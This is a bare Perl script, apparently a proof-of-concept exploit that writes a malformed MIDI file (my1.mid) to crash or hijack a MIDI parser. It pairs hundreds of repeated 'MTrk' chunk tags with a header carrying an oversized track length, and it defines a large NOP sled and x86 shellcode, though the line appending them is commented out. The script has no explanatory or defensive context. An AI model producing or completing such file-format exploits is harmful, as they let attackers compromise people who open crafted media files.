my $a   = "\x41"x500;
my $b   = "\x42"x500;
my $nop = "\x90"x50000;
my $sh  = "\x31\xd2\xeb\x19\x5b\x89\x53\x0d".
"\x52\x53\x53\x52\xb8\xea\x07\x45".
"\x7e\xff\xd0\x31\xd2\x52\xb8\x12".
"\xcb\x81\x7c\xff\xd0\xe8\xe2\xff".
"\xff\xff\x48\x65\x6c\x6c\x6f\x2c".
"\x20\x57\x6f\x72\x6c\x64\x0a\x23";

my  $junk = "\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B";
    $junk.= "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x01\x00\x13\x00\x78\x4D\x54";
    $junk.= "\x72\x6B\xFF\xFF\xF8\x00\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";
    #$junk.= $a.$nop.$sh.$b;
    $junk.= "\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54";
    $junk.= "\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B\x4D\x54\x72\x6B";
    
my $midi = $junk;

print "len: ".length($midi)." midi: no \n";

open(FILE, ">", "my1.mid");
print FILE $midi;
close(FILE);